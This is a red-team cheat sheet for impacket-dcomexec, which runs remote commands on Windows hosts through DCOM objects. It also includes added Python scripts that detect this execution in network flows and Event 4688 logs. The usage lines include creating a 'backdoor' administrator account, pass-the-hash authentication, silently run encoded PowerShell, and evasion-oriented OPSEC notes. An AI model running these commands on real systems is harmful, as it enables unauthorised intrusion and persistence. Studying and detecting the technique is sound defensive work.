
Overview

impacket-dcomexec executes commands on a remote Windows host by abusing legitimate DCOM (Distributed Component Object Model) objects. It provides a semi-interactive shell without creating services or scheduled tasks. Three DCOM objects are supported, each with different execution characteristics and detection profiles.

Authentication

Method      Flag                   Example
Password    domain/user:password   CORP/admin:Password1
NTLM hash   -hashes                -hashes :aad3b435b51404eeaad3b435b51404ee
Kerberos    -k -no-pass            -k -no-pass -dc-ip 10.10.10.1

Basic Usage

Interactive semi-shell (default object is MMC20.Application):
impacket-dcomexec CORP/admin:[email protected]
Execute a single command:
impacket-dcomexec CORP/admin:[email protected] "whoami"
Execute a command without retrieving its output (-nooutput):
impacket-dcomexec -nooutput CORP/admin:[email protected] "net user backdoor Pass123 /add"

Available DCOM Objects

MMC20.Application (default)

impacket-dcomexec -object MMC20.Application CORP/admin:[email protected]
Uses the MMC20.Application COM object and calls Document.ActiveView.ExecuteShellCommand(). The command process spawns under mmc.exe.

ShellWindows

impacket-dcomexec -object ShellWindows CORP/admin:[email protected]
Uses the ShellWindows COM object (Shell.Explorer) and attaches to an existing explorer.exe instance, so a user must be interactively logged on to the target. The command process spawns under explorer.exe.

ShellBrowserWindow

impacket-dcomexec -object ShellBrowserWindow CORP/admin:[email protected]
Similar to ShellWindows but uses a different COM class. Process spawns under explorer.exe.

Specify Object with -object

Object              CLSID                                  Parent Process
MMC20.Application   49B2791A-B1AE-4C90-9B8E-E860BA07F889   mmc.exe
ShellWindows        9BA05972-F6A8-11CF-A442-00A0C90A8F39   explorer.exe
ShellBrowserWindow  C08AFD90-F2A1-11D1-8455-00A0C91F3880   explorer.exe
# Try ShellWindows if MMC20 is blocked
impacket-dcomexec -object ShellWindows CORP/admin:[email protected] "whoami"

How It Works

  1. Authenticates to the target via RPC (port 135)
  2. Requests instantiation of the specified DCOM object
  3. The DCOM runtime negotiates a dynamic high port (49152+) for the object
  4. Calls a method on the object to execute cmd.exe /C <command>
  5. Output is redirected to a temp file and read back over SMB (port 445)
  6. Temp file is deleted after reading
The target must be reachable on ports 135 (RPC) and 445 (SMB) plus the dynamic high-port range (49152-65535).
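The port sequence in the steps above, turned into a simple hunting rule over network flow records. This is an added example written for this page, not code from impacket or from the page's author; the Flow record layout, the 30-second window, the target address 10.10.10.5 and the sample flows are all constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Assumed flow record layout: start time, source, destination, destination port.
@dataclass(frozen=True)
class Flow:
    ts: float   # epoch seconds
    src: str
    dst: str
    dport: int

DYNAMIC_PORTS = range(49152, 65536)   # DCOM dynamic high-port range

def find_dcom_exec_candidates(flows: Iterable[Flow], window: float = 30.0) -> List[Tuple[str, str, float]]:
    """Return (src, dst, first_ts) for every src->dst pair that, within `window`
    seconds of first contacting the RPC endpoint mapper (135), also reaches a
    dynamic high port (49152-65535) and SMB (445): the footprint left when the
    DCOM object is instantiated and the output file is read back."""
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f.src, f.dst)].append(f)

    hits = []
    for (src, dst), seq in by_pair.items():
        seq.sort(key=lambda f: f.ts)
        for i, first in enumerate(seq):
            if first.dport != 135:          # anchor each window on the 135 contact
                continue
            in_window = [f for f in seq[i:] if f.ts - first.ts <= window]
            saw_dynamic = any(f.dport in DYNAMIC_PORTS for f in in_window)
            saw_smb = any(f.dport == 445 for f in in_window)
            if saw_dynamic and saw_smb:
                hits.append((src, dst, first.ts))
                break                       # one lead per pair is enough
    return hits

# Constructed sample flows (not a real capture); 10.10.10.5 is the assumed target.
SAMPLE_FLOWS = [
    Flow(1000.0, "10.10.10.50", "10.10.10.5", 135),    # endpoint mapper
    Flow(1000.4, "10.10.10.50", "10.10.10.5", 49672),  # DCOM object on a dynamic port
    Flow(1001.2, "10.10.10.50", "10.10.10.5", 445),    # output file read back over SMB
    Flow(1500.0, "10.10.10.60", "10.10.10.5", 445),    # plain file-share access, no RPC
    Flow(1600.0, "10.10.10.70", "10.10.10.5", 135),    # RPC client that never touches SMB
    Flow(1600.3, "10.10.10.70", "10.10.10.5", 49700),
    Flow(1700.0, "10.10.10.80", "10.10.10.5", 135),    # 445 arrives too late for the window
    Flow(1700.5, "10.10.10.80", "10.10.10.5", 49800),
    Flow(1800.0, "10.10.10.80", "10.10.10.5", 445),
]

if __name__ == "__main__":
    for src, dst, ts in find_dcom_exec_candidates(SAMPLE_FLOWS):
        print(f"candidate DCOM execution: {src} -> {dst} starting at t={ts}")
```

Any other DCOM or RPC client (WMI included) produces the same 135 plus dynamic-port contact, and SMB on 445 is everywhere, so treat a hit as a lead to pivot into the target's process-creation events rather than as an alert on its own.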

OPSEC

Artifact            Details
No service created  Unlike PsExec, no service is installed
No scheduled task   Unlike atexec, no task is registered
Process parent      Depends on the DCOM object used (mmc.exe or explorer.exe)
Network             RPC on 135 + dynamic high ports + SMB 445
Temp file           Output written to C:\Windows\Temp\<random>.tmp
Event 4688          Process creation shows parent as mmc.exe/explorer.exe
DCOM execution is harder to detect than PsExec/smbexec because it uses legitimate COM objects. The unusual parent-child process relationship (e.g., mmc.exe spawning cmd.exe) is the primary detection vector.
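The parent-child relationship the paragraph above calls the primary detection vector, applied to Windows Security Event 4688 data. This is an added example for this page, not code from impacket or from the page's author; the record layout (a SIEM-style field subset), the severity levels and the sample events are constructed assumptions.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# How unusual a cmd.exe child of each DCOM parent (from the object table) is.
# explorer.exe launching cmd.exe is everyday interactive behaviour, so on its own
# it only rates "low"; mmc.exe launching cmd.exe is rare enough to rate "high".
PARENT_BASE_SEVERITY = {"mmc.exe": "high", "explorer.exe": "low"}

# Markers of the non-interactive execution described under "How It Works":
# a one-shot "cmd.exe /C <command>" whose output is redirected into a .tmp
# file under C:\Windows\Temp.
ONESHOT_RE = re.compile(r"(?:^|\s)/c\s", re.IGNORECASE)
TEMP_REDIRECT_RE = re.compile(r">\s*[A-Za-z]:\\Windows\\Temp\\\S+\.tmp", re.IGNORECASE)

@dataclass
class Finding:
    ts: str
    host: str
    severity: str
    reason: str

def classify_4688(rec: dict) -> Optional[Finding]:
    """Score one 4688 record; return None when it is not a DCOM-style spawn."""
    parent = ntpath.basename(rec["parent"]).lower()
    child = ntpath.basename(rec["new"]).lower()
    if child != "cmd.exe" or parent not in PARENT_BASE_SEVERITY:
        return None
    cmdline = rec.get("cmdline", "")
    oneshot = ONESHOT_RE.search(cmdline) is not None
    redirected = TEMP_REDIRECT_RE.search(cmdline) is not None
    severity = PARENT_BASE_SEVERITY[parent]
    reason = f"{parent} spawned cmd.exe"
    if oneshot and redirected:
        severity = "high"           # full footprint, whatever the parent
        reason += " with /C and output redirected to a Temp .tmp file"
    elif oneshot:
        severity = "medium" if severity == "low" else severity
        reason += " non-interactively with /C"
    return Finding(rec["ts"], rec["host"], severity, reason)

def scan_4688(records: Iterable[dict]) -> List[Finding]:
    return [f for f in (classify_4688(r) for r in records) if f is not None]

# Constructed 4688 records (sample data, not real logs): the field subset a SIEM
# would extract, with paths in the form the event reports them.
SAMPLE_4688 = [
    {"ts": "2024-05-01T10:00:01", "host": "WS01", "user": "CORP\\admin",
     "parent": "C:\\Windows\\System32\\mmc.exe",
     "new": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /C whoami 1> C:\\Windows\\Temp\\__1714557601.tmp 2>&1"},
    {"ts": "2024-05-01T10:05:12", "host": "WS01", "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\explorer.exe",
     "new": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "\"C:\\Windows\\System32\\cmd.exe\""},      # user opened a console
    {"ts": "2024-05-01T10:07:40", "host": "WS02", "user": "CORP\\admin",
     "parent": "C:\\Windows\\explorer.exe",
     "new": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /C hostname 1> C:\\Windows\\Temp\\__1714558060.tmp 2>&1"},
    {"ts": "2024-05-01T10:09:00", "host": "WS02", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Windows\\System32\\services.exe",
     "new": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for f in scan_4688(SAMPLE_4688):
        print(f"[{f.severity:6}] {f.ts} {f.host}: {f.reason}")
```

Command-line auditing must be enabled for 4688 to carry the command line at all; without it only the parent-child rule fires. The base severity deliberately rests on the parent alone, because runs with -nooutput or -silentcommand retrieve no output and therefore show no redirect to a temp file.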

Pass-the-Hash

impacket-dcomexec -hashes :aad3b435b51404eeaad3b435b51404ee [email protected]
With specific object:
impacket-dcomexec -hashes :aad3b435b51404eeaad3b435b51404ee -object ShellWindows [email protected]

Kerberos Authentication

export KRB5CCNAME=/tmp/admin.ccache
impacket-dcomexec -k -no-pass CORP/[email protected]
With explicit DC IP:
impacket-dcomexec -k -no-pass -dc-ip 10.10.10.1 CORP/[email protected]
Target must be specified by hostname (FQDN) when using Kerberos, not by IP.

Quick Reference

# Interactive shell (default MMC20)
impacket-dcomexec CORP/admin:[email protected]

# Single command
impacket-dcomexec CORP/admin:[email protected] "whoami"

# Use ShellWindows object
impacket-dcomexec -object ShellWindows CORP/admin:[email protected]

# Use ShellBrowserWindow object
impacket-dcomexec -object ShellBrowserWindow CORP/admin:[email protected]

# Pass-the-hash
impacket-dcomexec -hashes :NT_HASH [email protected]

# Kerberos
export KRB5CCNAME=/tmp/admin.ccache
impacket-dcomexec -k -no-pass CORP/[email protected]

# No output (blind execution)
impacket-dcomexec -nooutput CORP/admin:[email protected] "net user backdoor Pass123 /add"

# Silently execute (fire and forget)
impacket-dcomexec -silentcommand CORP/admin:[email protected] "powershell -e JABjAGwA..."

Flag            Description
-object         DCOM object to use (MMC20.Application, ShellWindows, ShellBrowserWindow)
-hashes         NTLM hash for pass-the-hash (LM:NT or :NT)
-k              Use Kerberos authentication
-no-pass        No password prompt (use with -k)
-dc-ip          Domain Controller IP for Kerberos
-nooutput       Do not retrieve command output
-silentcommand  Do not retrieve output and do not open a shell
-codec          Output encoding (default: utf-8)